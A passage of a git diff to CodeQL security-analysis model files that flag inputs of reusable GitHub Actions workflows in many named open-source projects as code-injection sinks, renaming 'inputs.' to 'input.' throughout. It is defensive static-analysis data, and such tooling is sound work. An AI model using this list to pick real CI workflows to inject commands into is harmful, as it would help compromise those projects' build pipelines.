a/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml b/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml index 9f7298797233..4d104c74c667 100644 --- a/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml @@ -3,12 +3,12 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["element-hq/element-desktop/.github/workflows/build_windows.yaml", "*", "inputs.version", "code-injection", "generated"] - - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "inputs.config", "code-injection", "generated"] - - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "inputs.version", "code-injection", "generated"] - - ["element-hq/element-desktop/.github/workflows/build_macos.yaml", "*", "inputs.base-url", "code-injection", "generated"] - - ["element-hq/element-desktop/.github/workflows/build_macos.yaml", "*", "inputs.version", "code-injection", "generated"] - - ["element-hq/element-desktop/.github/workflows/build_linux.yaml", "*", "inputs.version", "code-injection", "generated"] + - ["element-hq/element-desktop/.github/workflows/build_windows.yaml", "*", "input.version", "code-injection", "generated"] + - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "input.config", "code-injection", "generated"] + - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "input.version", "code-injection", "generated"] + - ["element-hq/element-desktop/.github/workflows/build_macos.yaml", "*", "input.base-url", "code-injection", "generated"] + - ["element-hq/element-desktop/.github/workflows/build_macos.yaml", "*", "input.version", "code-injection", "generated"] + - ["element-hq/element-desktop/.github/workflows/build_linux.yaml", "*", "input.version", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all extensible: summaryModel diff --git a/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml b/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml index 835bbf4cf895..9f56abf2858b 100644 --- a/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["etcd-io/bbolt/.github/workflows/robustness_template.yaml", "*", "inputs.testTimeout", "code-injection", "generated"] - - ["etcd-io/bbolt/.github/workflows/robustness_template.yaml", "*", "inputs.count", "code-injection", "generated"] \ No newline at end of file + - ["etcd-io/bbolt/.github/workflows/robustness_template.yaml", "*", "input.testTimeout", "code-injection", "generated"] + - ["etcd-io/bbolt/.github/workflows/robustness_template.yaml", "*", "input.count", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml b/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml index 453c3cd06f3a..8c73342d5fe3 100644 --- a/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["etcd-io/etcd/.github/workflows/tests-template.yaml", "*", "inputs.arch", "code-injection", "generated"] - - ["etcd-io/etcd/.github/workflows/robustness-template.yaml", "*", "inputs.scenario", "code-injection", "generated"] - - ["etcd-io/etcd/.github/workflows/robustness-template.yaml", "*", "inputs.testTimeout", "code-injection", "generated"] - - ["etcd-io/etcd/.github/workflows/robustness-template.yaml", "*", "inputs.count", "code-injection", "generated"] \ No newline at end of file + - ["etcd-io/etcd/.github/workflows/tests-template.yaml", "*", "input.arch", "code-injection", "generated"] + - ["etcd-io/etcd/.github/workflows/robustness-template.yaml", "*", "input.scenario", "code-injection", "generated"] + - ["etcd-io/etcd/.github/workflows/robustness-template.yaml", "*", "input.testTimeout", "code-injection", "generated"] + - ["etcd-io/etcd/.github/workflows/robustness-template.yaml", "*", "input.count", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml b/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml index 32e6124c06ea..87253d882243 100644 --- a/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["eventstore/eventstore/.github/workflows/build-reusable.yml", "*", "inputs.arch", "code-injection", "generated"] - - ["eventstore/eventstore/.github/workflows/build-container-reusable.yml", "*", "inputs.container-runtime", "code-injection", "generated"] \ No newline at end of file + - ["eventstore/eventstore/.github/workflows/build-reusable.yml", "*", "input.arch", "code-injection", "generated"] + - ["eventstore/eventstore/.github/workflows/build-container-reusable.yml", "*", "input.container-runtime", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml b/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml index 09177714b081..9eb4c17cd3a8 100644 --- a/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["expensify/app/.github/workflows/e2ePerformanceTests.yml", "*", "inputs.PR_NUMBER", "code-injection", "generated"] \ No newline at end of file + - ["expensify/app/.github/workflows/e2ePerformanceTests.yml", "*", "input.PR_NUMBER", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml b/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml index 78243b4c6d73..860dcdcb43d4 100644 --- a/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["external-secrets/external-secrets/.github/workflows/publish.yml", "*", "inputs.image-tag", "code-injection", "generated"] - - ["external-secrets/external-secrets/.github/workflows/publish.yml", "*", "inputs.tag-suffix", "code-injection", "generated"] \ No newline at end of file + - ["external-secrets/external-secrets/.github/workflows/publish.yml", "*", "input.image-tag", "code-injection", "generated"] + - ["external-secrets/external-secrets/.github/workflows/publish.yml", "*", "input.tag-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml b/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml index 6e69fb89fc87..539edcd58916 100644 --- a/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["facebook/create-react-app/.github/workflows/e2e-base.yml", "*", "inputs.testScript", "code-injection", "generated"] \ No newline at end of file + - ["facebook/create-react-app/.github/workflows/e2e-base.yml", "*", "input.testScript", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml b/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml index fee19d65a097..b1b37d967e9a 100644 --- a/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml @@ -3,13 +3,13 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "inputs.aws_s3_cp_extra_args", "code-injection", "generated"] - - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "inputs.s3_path", "code-injection", "generated"] - - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "inputs.filter", "code-injection", "generated"] - - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "inputs.artifact_tag", "code-injection", "generated"] - - ["facebookresearch/xformers/.github/workflows/wheels_upload_pip.yml", "*", "inputs.filter", "code-injection", "generated"] - - ["facebookresearch/xformers/.github/workflows/wheels_upload_pip.yml", "*", "inputs.artifact_tag", "code-injection", "generated"] - - ["facebookresearch/xformers/.github/workflows/wheels_upload_pip.yml", "*", "inputs.pypirc", "code-injection", "generated"] - - ["facebookresearch/xformers/.github/workflows/wheels_build.yml", "*", "inputs.cuda_short_version", "code-injection", "generated"] - - ["facebookresearch/xformers/.github/workflows/wheels_build.yml", "*", "inputs.torch_version", "code-injection", "generated"] - - ["facebookresearch/xformers/.github/workflows/linters_reusable.yml", "*", "inputs.pre-script", "code-injection", "generated"] \ No newline at end of file + - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "input.aws_s3_cp_extra_args", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "input.s3_path", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "input.filter", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "input.artifact_tag", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_pip.yml", "*", "input.filter", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_pip.yml", "*", "input.artifact_tag", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_pip.yml", "*", "input.pypirc", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_build.yml", "*", "input.cuda_short_version", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_build.yml", "*", "input.torch_version", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/linters_reusable.yml", "*", "input.pre-script", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml b/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml index 51b58ab74f58..51691edc1f97 100644 --- a/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["falcosecurity/falco/.github/workflows/reusable_build_packages.yaml", "*", "inputs.build_type", "code-injection", "generated"] - - ["falcosecurity/falco/.github/workflows/reusable_build_packages.yaml", "*", "inputs.version", "code-injection", "generated"] - - ["falcosecurity/falco/.github/workflows/reusable_test_packages.yaml", "*", "inputs.version", "code-injection", "generated"] - - ["falcosecurity/falco/.github/workflows/reusable_test_packages.yaml", "*", "inputs.arch", "code-injection", "generated"] - - ["falcosecurity/falco/.github/workflows/reusable_publish_packages.yaml", "*", "inputs.version", "code-injection", "generated"] - - ["falcosecurity/falco/.github/workflows/reusable_publish_packages.yaml", "*", "inputs.bucket_suffix", "code-injection", "generated"] \ No newline at end of file + - ["falcosecurity/falco/.github/workflows/reusable_build_packages.yaml", "*", "input.build_type", "code-injection", "generated"] + - ["falcosecurity/falco/.github/workflows/reusable_build_packages.yaml", "*", "input.version", "code-injection", "generated"] + - ["falcosecurity/falco/.github/workflows/reusable_test_packages.yaml", "*", "input.version", "code-injection", "generated"] + - ["falcosecurity/falco/.github/workflows/reusable_test_packages.yaml", "*", "input.arch", "code-injection", "generated"] + - ["falcosecurity/falco/.github/workflows/reusable_publish_packages.yaml", "*", "input.version", "code-injection", "generated"] + - ["falcosecurity/falco/.github/workflows/reusable_publish_packages.yaml", "*", "input.bucket_suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml b/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml index 5a53b788312c..3a14f6a879d5 100644 --- a/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["fastify/fastify/.github/workflows/citgm-package.yml", "*", "inputs.package", "code-injection", "generated"] \ No newline at end of file + - ["fastify/fastify/.github/workflows/citgm-package.yml", "*", "input.package", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml b/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml index 579e295213bf..c7f84e83db5a 100644 --- a/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ferretdb/ferretdb/.github/workflows/_integration.yml", "*", "inputs.task", "code-injection", "generated"] \ No newline at end of file + - ["ferretdb/ferretdb/.github/workflows/_integration.yml", "*", "input.task", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml b/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml index bc8133b907c6..72383be71ca2 100644 --- a/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["filecoin-project/venus/.github/workflows/common_go.yml", "*", "inputs.test_timeout", "code-injection", "generated"] - - ["filecoin-project/venus/.github/workflows/common_go.yml", "*", "inputs.log_level", "code-injection", "generated"] - - ["filecoin-project/venus/.github/workflows/common_build_upload.yml", "*", "inputs.bin_name", "code-injection", "generated"] - - ["filecoin-project/venus/.github/workflows/common_build_upload.yml", "*", "inputs.has_ffi", "code-injection", "generated"] \ No newline at end of file + - ["filecoin-project/venus/.github/workflows/common_go.yml", "*", "input.test_timeout", "code-injection", "generated"] + - ["filecoin-project/venus/.github/workflows/common_go.yml", "*", "input.log_level", "code-injection", "generated"] + - ["filecoin-project/venus/.github/workflows/common_build_upload.yml", "*", "input.bin_name", "code-injection", "generated"] + - ["filecoin-project/venus/.github/workflows/common_build_upload.yml", "*", "input.has_ffi", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml b/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml index 232c6abb3f33..8b05adf053ea 100644 --- a/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml @@ -3,17 +3,17 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "inputs.triggered_by_callable", "code-injection", "generated"] - - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "inputs.package_version_number", "code-injection", "generated"] - - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "inputs.base_branch", "code-injection", "generated"] - - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "inputs.cpp_release_version", "code-injection", "generated"] - - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "inputs.platforms", "code-injection", "generated"] - - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "inputs.runIntegrationTests", "code-injection", "generated"] - - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "inputs.apis", "code-injection", "generated"] - - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "inputs.working_branch", "code-injection", "generated"] - - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "inputs.release_label", "code-injection", "generated"] - - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "inputs.create_new_branch", "code-injection", "generated"] - - ["firebase/firebase-unity-sdk/.github/workflows/build_windows.yml", "*", "inputs.apis", "code-injection", "generated"] - - ["firebase/firebase-unity-sdk/.github/workflows/build_tvos.yml", "*", "inputs.apis", "code-injection", "generated"] - - ["firebase/firebase-unity-sdk/.github/workflows/build_macos.yml", "*", "inputs.apis", "code-injection", "generated"] - - ["firebase/firebase-unity-sdk/.github/workflows/build_linux.yml", "*", "inputs.apis", "code-injection", "generated"] \ No newline at end of file + - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "input.triggered_by_callable", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "input.package_version_number", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "input.base_branch", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "input.cpp_release_version", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "input.platforms", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "input.runIntegrationTests", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "input.apis", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "input.working_branch", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "input.release_label", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "input.create_new_branch", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/build_windows.yml", "*", "input.apis", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/build_tvos.yml", "*", "input.apis", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/build_macos.yml", "*", "input.apis", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/build_linux.yml", "*", "input.apis", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml b/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml index 8a7d3c60c452..9eec959ade3a 100644 --- a/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["flarum/framework/.github/workflows/REUSABLE_backend.yml", "*", "inputs.monorepo_tests", "code-injection", "generated"] \ No newline at end of file + - ["flarum/framework/.github/workflows/REUSABLE_backend.yml", "*", "input.monorepo_tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml b/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml index a1e523d92cec..835301ecc73a 100644 --- a/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml @@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["fluent/fluent-bit/.github/workflows/call-windows-unit-tests.yaml", "*", "inputs.unstable", "code-injection", "generated"] - - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/reuse_latest_release_binaries.yml", "*", "inputs.the_path", "code-injection", "generated"] - - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/reuse_latest_release_binaries.yml", "*", "inputs.last_commit", "code-injection", "generated"] - - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/reuse_latest_release_binaries.yml", "*", "inputs.binary_name_stem", "code-injection", "generated"] - - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamrc.yml", "*", "inputs.ver_num", "code-injection", "generated"] - - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamrc.yml", "*", "inputs.runner", "code-injection", "generated"] - - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamr_vscode_ext.yml", "*", "inputs.ver_num", "code-injection", "generated"] - - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamr_sdk.yml", "*", "inputs.ver_num", "code-injection", "generated"] \ No newline at end of file + - ["fluent/fluent-bit/.github/workflows/call-windows-unit-tests.yaml", "*", "input.unstable", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.the_path", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.last_commit", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.binary_name_stem", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamrc.yml", "*", "input.ver_num", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamrc.yml", "*", "input.runner", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamr_vscode_ext.yml", "*", "input.ver_num", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamr_sdk.yml", "*", "input.ver_num", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml b/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml index 22729c980dea..9a99588239ee 100644 --- a/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["flux-iac/tofu-controller/.github/workflows/targeted-test.yaml", "*", "inputs.pattern", "code-injection", "generated"] \ No newline at end of file + - ["flux-iac/tofu-controller/.github/workflows/targeted-test.yaml", "*", "input.pattern", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml b/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml index e242d38bdbe1..12c370b33ada 100644 --- a/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["flyteorg/flyte/.github/workflows/publish.yml", "*", "inputs.before-build", "code-injection", "generated"] - - ["flyteorg/flyte/.github/workflows/integration.yml", "*", "inputs.component", "code-injection", "generated"] - - ["flyteorg/flyte/.github/workflows/component_docker_build.yml", "*", "inputs.component", "code-injection", "generated"] \ No newline at end of file + - ["flyteorg/flyte/.github/workflows/publish.yml", "*", "input.before-build", "code-injection", "generated"] + - ["flyteorg/flyte/.github/workflows/integration.yml", "*", "input.component", "code-injection", "generated"] + - ["flyteorg/flyte/.github/workflows/component_docker_build.yml", "*", "input.component", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml b/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml index f9c6658f5b8d..0e03216fc698 100644 --- a/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "inputs.org", "code-injection", "generated"] - - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "inputs.solution", "code-injection", "generated"] - - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "inputs.compose-command", "code-injection", "generated"] \ No newline at end of file + - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "input.org", "code-injection", "generated"] + - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "input.solution", "code-injection", "generated"] + - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "input.compose-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml b/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml index 798c6bcc37a3..081378c96179 100644 --- a/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["freecad/freecad/.github/workflows/sub_wrapup.yml", "*", "inputs.previousSteps", "code-injection", "generated"] \ No newline at end of file + - ["freecad/freecad/.github/workflows/sub_wrapup.yml", "*", "input.previousSteps", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml b/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml index 687db46824ac..fcd9c2929013 100644 --- a/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "inputs.output-path", "code-injection", "generated"] - - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "inputs.settings", "code-injection", "generated"] - - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "inputs.requirements", "code-injection", "generated"] \ No newline at end of file + - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "input.output-path", "code-injection", "generated"] + - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "input.settings", "code-injection", "generated"] + - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "input.requirements", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml b/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml index 8a13569af7c9..19822c29fcda 100644 --- a/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["getporter/porter/.github/workflows/build_pipelinesrelease_template.yml", "*", "inputs.registry", "code-injection", "generated"] \ No newline at end of file + - ["getporter/porter/.github/workflows/build_pipelinesrelease_template.yml", "*", "input.registry", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml index 453eb862b94a..d0ccde698b1a 100644 --- a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["getsentry/sentry-dart/.github/workflows/analyze.yml", "*", "inputs.panaThreshold", "code-injection", "generated"] - - ["getsentry/sentry-dart/.github/workflows/analyze.yml", "*", "inputs.sdk", "code-injection", "generated"] \ No newline at end of file + - ["getsentry/sentry-dart/.github/workflows/analyze.yml", "*", "input.panaThreshold", "code-injection", "generated"] + - ["getsentry/sentry-dart/.github/workflows/analyze.yml", "*", "input.sdk", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml index 37074688f173..027da83e922d 100644 --- a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["getsentry/sentry-unity/.github/workflows/sdk.yml", "*", "inputs.target", "code-injection", "generated"] - - ["getsentry/sentry-unity/.github/workflows/android-smoke-test.yml", "*", "inputs.api-level", "code-injection", "generated"] \ No newline at end of file + - ["getsentry/sentry-unity/.github/workflows/sdk.yml", "*", "input.target", "code-injection", "generated"] + - ["getsentry/sentry-unity/.github/workflows/android-smoke-test.yml", "*", "input.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml b/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml index 2e1835cadcad..a914aa631c3d 100644 --- a/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["gitpod-io/gitpod/.github/workflows/jetbrains-auto-update-template.yml", "*", "inputs.productId", "code-injection", "generated"] \ No newline at end of file + - ["gitpod-io/gitpod/.github/workflows/jetbrains-auto-update-template.yml", "*", "input.productId", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml b/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml index 